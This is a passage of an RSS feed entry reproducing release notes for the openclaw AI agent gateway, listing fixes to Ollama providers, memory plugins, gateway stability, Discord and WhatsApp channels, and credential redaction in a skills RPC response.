data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56939/hovercard" href="https://github.com/openclaw/openclaw/issues/56939">#56939</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4218171224" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62533" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62533/hovercard" href="https://github.com/openclaw/openclaw/issues/62533">#62533</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4063699337" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43945" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/43945/hovercard" href="https://github.com/openclaw/openclaw/issues/43945">#43945</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4242267309" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64541" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64541/hovercard" href="https://github.com/openclaw/openclaw/issues/64541">#64541</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289810240" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68796" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68796/hovercard" href="https://github.com/openclaw/openclaw/issues/68796">#68796</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4040967916" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/39690" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/39690/hovercard" href="https://github.com/openclaw/openclaw/issues/39690">#39690</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4164708025" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/57116" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/57116/hovercard" href="https://github.com/openclaw/openclaw/pull/57116">#57116</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4218493302" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62549" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/62549/hovercard" href="https://github.com/openclaw/openclaw/pull/62549">#62549</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4294028827" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69261" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69261/hovercard" href="https://github.com/openclaw/openclaw/pull/69261">#69261</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4305660897" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69857" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69857/hovercard" href="https://github.com/openclaw/openclaw/pull/69857">#69857</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4246414524" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65143" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65143/hovercard" href="https://github.com/openclaw/openclaw/pull/65143">#65143</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4261643783" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66511" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66511/hovercard" href="https://github.com/openclaw/openclaw/pull/66511">#66511</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4063699337" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43945" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/43945/hovercard" href="https://github.com/openclaw/openclaw/issues/43945">#43945</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4058318799" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43224" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/43224/hovercard" href="https://github.com/openclaw/openclaw/pull/43224">#43224</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4041140398" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/39785" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/39785/hovercard" href="https://github.com/openclaw/openclaw/pull/39785">#39785</a>. Thanks @maximus-dss, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>, @IanxDev, @tsukhani, @issacthekaylon, @Julien-BKK, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Linux2010/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Linux2010">@Linux2010</a>, @hyspacex, @maxramsay, @Meli73, @LittleJakub, @Juankcba, @uninhibite-scholar, @yfge, @Skrblik, and @Mriris.</li>
<li>Providers/Ollama: move memory embeddings to <code>/api/embed</code> with batched <code>input</code>, route local web search through Ollama's signed daemon proxy while keeping cloud auth scoped, treat Ollama memory embeddings as key-optional in doctor, and keep model usage visible by estimating native transcript usage when <code>/api/chat</code> omits counters. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4041488866" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/39983" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/39983/hovercard" href="https://github.com/openclaw/openclaw/issues/39983">#39983</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4292504181" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69132" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69132/hovercard" href="https://github.com/openclaw/openclaw/issues/69132">#69132</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4076765556" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46584" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/46584/hovercard" href="https://github.com/openclaw/openclaw/issues/46584">#46584</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4039238525" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/39112" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/39112/hovercard" href="https://github.com/openclaw/openclaw/pull/39112">#39112</a>. Thanks @sskkcc, @LiudengZhang, @yoon1012, @hyspacex, @fengly78, and @TylonHH.</li>
<li>Agents/Ollama: parse stringified native tool-call arguments, retry native empty/thinking-only turns, accept already-prefixed LLM task model overrides, apply provider-owned replay normalization for Cloud models, validate explicit <code>--thinking max</code>, show resolved thinking defaults in Control UI, and include configured provider models in <code>models list --provider</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4303167754" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69735" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69735/hovercard" href="https://github.com/openclaw/openclaw/issues/69735">#69735</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4098081207" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50052" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/50052/hovercard" href="https://github.com/openclaw/openclaw/issues/50052">#50052</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328894010" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71697" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71697/hovercard" href="https://github.com/openclaw/openclaw/issues/71697">#71697</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328145755" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71584" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71584/hovercard" href="https://github.com/openclaw/openclaw/issues/71584">#71584</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332228603" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72407" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72407/hovercard" href="https://github.com/openclaw/openclaw/issues/72407">#72407</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4246874368" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65207" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65207/hovercard" href="https://github.com/openclaw/openclaw/issues/65207">#65207</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4306117215" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69910" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69910/hovercard" href="https://github.com/openclaw/openclaw/pull/69910">#69910</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4262256583" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66552" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66552/hovercard" href="https://github.com/openclaw/openclaw/pull/66552">#66552</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4206791675" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61223" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61223/hovercard" href="https://github.com/openclaw/openclaw/issues/61223">#61223</a>. Thanks @rongshuzhao, @yfge, @L3G, @ralphy-maplebots, @Hollychou924, @ismael-81, @g0st1n, @NotecAG, and @drzeast-png.</li>
<li>Providers/PDF/Ollama: add bounded network timeouts for Ollama model pulls and native Anthropic/Gemini PDF analysis requests so unresponsive provider endpoints no longer hang sessions indefinitely. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4131775554" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54142" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54142/hovercard" href="https://github.com/openclaw/openclaw/issues/54142">#54142</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4131780831" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54144" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/54144/hovercard" href="https://github.com/openclaw/openclaw/pull/54144">#54144</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4131781144" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54145" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/54145/hovercard" href="https://github.com/openclaw/openclaw/pull/54145">#54145</a>. Thanks @jinduwang1001-max and @arkyu2077.</li>
<li>Docker/QA: add observability coverage to the normal Docker aggregate so QA-lab OTEL and Prometheus diagnostics run inside Docker. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Auto-reply: poison inbound message dedupe after replay-unsafe provider/runtime failures so retries stay safe before visible progress but cannot duplicate messages after block output, tool side effects, or session progress. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4295112826" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69303" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69303/hovercard" href="https://github.com/openclaw/openclaw/issues/69303">#69303</a>; keeps <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4181977803" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58549" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58549/hovercard" href="https://github.com/openclaw/openclaw/issues/58549">#58549</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4242766269" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64606" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64606/hovercard" href="https://github.com/openclaw/openclaw/issues/64606">#64606</a> as duplicate validation. Thanks @martingarramon, @NikolaFC, and @zeroth-blip.</li>
<li>Agents/model fallback: keep auto-persisted fallback model overrides selected across turns until <code>/new</code> or reset clears them, avoiding repeated probes of a known-bad primary while <code>/status</code> shows the selected and active models. Thanks @kibedu.</li>
<li>Agents/model fallback: jump directly to a known later live-session model redirect instead of walking unrelated fallback candidates, while preserving the already-landed live-session/fallback loop guard. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4167179452" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/57471" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/57471/hovercard" href="https://github.com/openclaw/openclaw/issues/57471">#57471</a>; related loop family already closed via <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4181008782" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58496" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58496/hovercard" href="https://github.com/openclaw/openclaw/issues/58496">#58496</a>. Thanks @yuxiaoyang2007-prog.</li>
<li>Gateway/Bonjour: keep @homebridge/ciao cancellation handlers registered across advertiser restarts so late probing cancellations cannot crash Linux and other mDNS-churned gateways.</li>
<li>Plugins/startup: load the default <code>memory-core</code> slot during Gateway startup when permitted so active-memory recall can call <code>memory_search</code> and <code>memory_get</code> without requiring an explicit <code>plugins.slots.memory</code> entry, while preserving <code>plugins.slots.memory: "none"</code>.</li>
<li>Plugins/CLI: prefer native require for compiled bundled plugin JavaScript before jiti so read-only config, status, device, and node commands avoid unnecessary transform overhead on slow hosts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4221630999" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62842" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62842/hovercard" href="https://github.com/openclaw/openclaw/issues/62842">#62842</a>. Thanks @Effet.</li>
<li>Plugins/compat/CLI: inventory doctor-side deprecation migrations separately from runtime plugin compatibility, add dated records for legacy extension-api, memory registration, provider hook/type aliases, runtime aliases, channel SDK helpers, and approval/test utility shims, refresh the persisted registry after managed plugin removals, make plugin install/uninstall writes conflict-aware, clear stale denylists, and fail tracked plugin/hook updates or unloadable package installs instead of leaving stale state. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>WebChat/Control UI: support non-video file attachments in chat uploads while preserving the existing image attachment path and MIME-sniff fallback for generic image uploads. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320611972" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70947" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70947/hovercard" href="https://github.com/openclaw/openclaw/pull/70947">#70947</a>) Thanks @IAMSamuelRodda.</li>
<li>Skills/memory: restore Chokidar v5 hot reloads by watching concrete skill and memory roots with filters, including SKILL.md removals and deleted skill folders without broad workspace recursion. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3994509566" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/27404" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/27404/hovercard" href="https://github.com/openclaw/openclaw/issues/27404">#27404</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4019092319" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/33585" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/33585/hovercard" href="https://github.com/openclaw/openclaw/issues/33585">#33585</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4048900568" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/41606" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/41606/hovercard" href="https://github.com/openclaw/openclaw/issues/41606">#41606</a>. Thanks @shelvenzhou, @08820048, and @rocke2020.</li>
<li>Gateway/chat: keep duplicate attachment-backed <code>chat.send</code> retries with the same idempotency key on the documented in-flight path so aborts still target the real active run. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4308621432" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70139" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70139/hovercard" href="https://github.com/openclaw/openclaw/issues/70139">#70139</a>. Thanks @Feelw00.</li>
<li>Gateway/session rows: report the same config-resolved thinking default that runtime sessions use, including global and per-agent defaults, so Control UI and TUI default labels stay aligned. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329269914" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71779" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71779/hovercard" href="https://github.com/openclaw/openclaw/pull/71779">#71779</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4321156135" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70981" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70981/hovercard" href="https://github.com/openclaw/openclaw/pull/70981">#70981</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4321797296" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71033" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71033/hovercard" href="https://github.com/openclaw/openclaw/pull/71033">#71033</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4311083134" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70302" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70302/hovercard" href="https://github.com/openclaw/openclaw/pull/70302">#70302</a>) Thanks @chen-zhang-cs-code, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SymbolStar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SymbolStar">@SymbolStar</a>, and @cholaolu-boop.</li>
<li>Plugins: share package entrypoint resolution between install and discovery, reject mismatched <code>runtimeExtensions</code>, and cache bundled runtime-dependency manifest reads during scans.</li>
<li>WhatsApp/Web: keep quiet but healthy linked-device sessions connected by basing the watchdog on WhatsApp Web transport activity, while retaining a longer app-silence cap so frame activity cannot mask a stuck session forever. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317373252" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70678" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70678/hovercard" href="https://github.com/openclaw/openclaw/issues/70678">#70678</a>; carries forward the focused <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327494555" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71466" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71466/hovercard" href="https://github.com/openclaw/openclaw/pull/71466">#71466</a> approach and keeps <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4235211931" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63939" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63939/hovercard" href="https://github.com/openclaw/openclaw/pull/63939">#63939</a> as related configurable-timeout follow-up. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oromeis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oromeis">@oromeis</a>.</li>
<li>Discord/gateway: count failed health-monitor restart attempts toward cooldown and hourly caps, and evict stale account lifecycle state during channel reloads so repeated Discord gateway recovery cannot loop on old status. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4037442367" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/38596" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/38596/hovercard" href="https://github.com/openclaw/openclaw/issues/38596">#38596</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4042713721" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40413" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/40413/hovercard" href="https://github.com/openclaw/openclaw/pull/40413">#40413</a>) Thanks @jellyAI-dev and @vashquez.</li>
<li>Cron/context engine: run isolated cron jobs under run-scoped context-engine session keys so prior runs of the same job are not inherited unless the job is explicitly session-bound. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331505048" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72292" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72292/hovercard" href="https://github.com/openclaw/openclaw/pull/72292">#72292</a>) Thanks @jalehman.</li>
<li>Control UI: localize command palette labels, categories, skill shortcuts, footer hints, and connect-command copy labels while preserving localized command palette search matching. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4206202649" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61130" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/61130/hovercard" href="https://github.com/openclaw/openclaw/pull/61130">#61130</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4206163055" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61119" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/61119/hovercard" href="https://github.com/openclaw/openclaw/pull/61119">#61119</a>) Thanks @rubensfox20.</li>
<li>Plugins/memory-lancedb: request float embedding responses from OpenAI-compatible servers so local providers that default SDK requests to base64 no longer return dimension-mismatched LanceDB vectors while preserving configured dimensions. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4075425486" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/45982" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/45982/hovercard" href="https://github.com/openclaw/openclaw/issues/45982">#45982</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4187115245" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59048" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/59048/hovercard" href="https://github.com/openclaw/openclaw/pull/59048">#59048</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4075652492" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46069" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/46069/hovercard" href="https://github.com/openclaw/openclaw/pull/46069">#46069</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4075431997" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/45986" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/45986/hovercard" href="https://github.com/openclaw/openclaw/pull/45986">#45986</a>) Thanks @deep-introspection, @xiaokhkh, @caicongyang, and @thiswind.</li>
<li>Plugins/memory-lancedb: advance auto-capture cursors per session only after messages are processed or intentionally skipped, retry failed messages, survive compacted histories, and clear cursor state on session end. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326654147" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71349" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71349/hovercard" href="https://github.com/openclaw/openclaw/issues/71349">#71349</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4051142895" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42083" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/42083/hovercard" href="https://github.com/openclaw/openclaw/pull/42083">#42083</a>. Thanks @as775116191.</li>
<li>Plugins/memory-core: respect configured memory-search embedding concurrency during non-batch indexing so local Ollama embedding backends can serialize indexing instead of flooding the server. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4264947077" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66822" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66822/hovercard" href="https://github.com/openclaw/openclaw/issues/66822">#66822</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4265769455" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66931" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66931/hovercard" href="https://github.com/openclaw/openclaw/pull/66931">#66931</a>) Thanks @oliviareid-svg and @LyraInTheFlesh.</li>
<li>Docker/update smoke: keep the package-derived update-channel fixture on package-shipped files and make its UI build stub create the asset the updater verifies. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway/models: repair legacy <code>models.providers.*.api = "openai"</code> config values to <code>openai-completions</code>, and skip providers with future stale API enum values during startup instead of bricking the gateway. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332548488" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72477" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72477/hovercard" href="https://github.com/openclaw/openclaw/issues/72477">#72477</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332844009" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72542" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72542/hovercard" href="https://github.com/openclaw/openclaw/pull/72542">#72542</a>) Thanks @JooyoungChoi14 and @obviyus.</li>
<li>Gateway/skills: redact <code>apiKey</code> and secret-named <code>env</code> values from the <code>skills.update</code> RPC response to prevent leaking credentials into WebSocket traffic, client logs, or session transcripts. Config is still written to disk in full; only the response payload is redacted. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4306962807" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69998" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69998/hovercard" href="https://github.com/openclaw/openclaw/pull/69998">#69998</a>) Thanks @Ziy1-Tan.</li>
<li>Plugins/CLI: let flag-driven <code>openclaw channels add</code> install the selected channel plugin from its default source without opening an interactive prompt, fixing published npm Telegram setup in stdin-closed automation.</li>
<li>Onboarding/setup: keep first-run config reads, plugin compatibility notices, OpenAI Codex auth, post-auth default-model policy lookup, skip-auth, provider-scoped model pickers, and post-model sanity checks on cold manifest/setup metadata unless the user chooses to browse all models, avoiding full plugin/provider runtime loads between prompts. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Gateway/Bonjour: suppress known @homebridge/ciao cancellation and network assertion failures through scoped process handlers so malformed mDNS packets or restricted VPS networking disable/restart Bonjour instead of crashing the gateway. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4274075946" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67578" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67578/hovercard" href="https://github.com/openclaw/openclaw/issues/67578">#67578</a>. Thanks @zenassist26-create.</li>
<li>Discord: keep late clicks on already-resolved exec approval buttons quiet when elevated mode auto-resolved the request, while still surfacing real approval submission failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4265667453" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66906" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66906/hovercard" href="https://github.com/openclaw/openclaw/issues/66906">#66906</a>. Thanks @rlerikse.</li>
<li>Telegram: send a fresh final message for long-lived preview-streamed replies so the visible Telegram timestamp reflects completion time instead of the preview creation time. Thanks @rubencu.</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[openclaw 2026.4.25-beta.4]]></title>
<description><![CDATA[2026.4.25
Highlights

Voice replies get a full TTS upgrade: /tts latest, chat-scoped auto-TTS controls, personas, per-agent/per-account overrides, and new Azure Speech, Xiaomi, Local CLI, Inworld, Volcengine, and ElevenLabs v3 provider coverage. Thanks @leonchui, @zoujiejun, @solar2ain, @cshape, ...]]></description>
<link>https://tsecurity.de/de/3465811/downloads/openclaw-2026425-beta4/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3465811/downloads/openclaw-2026425-beta4/</guid>
<pubDate>Sun, 26 Apr 2026 15:31:25 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>2026.4.25</h2>
<h3>Highlights</h3>
<ul>
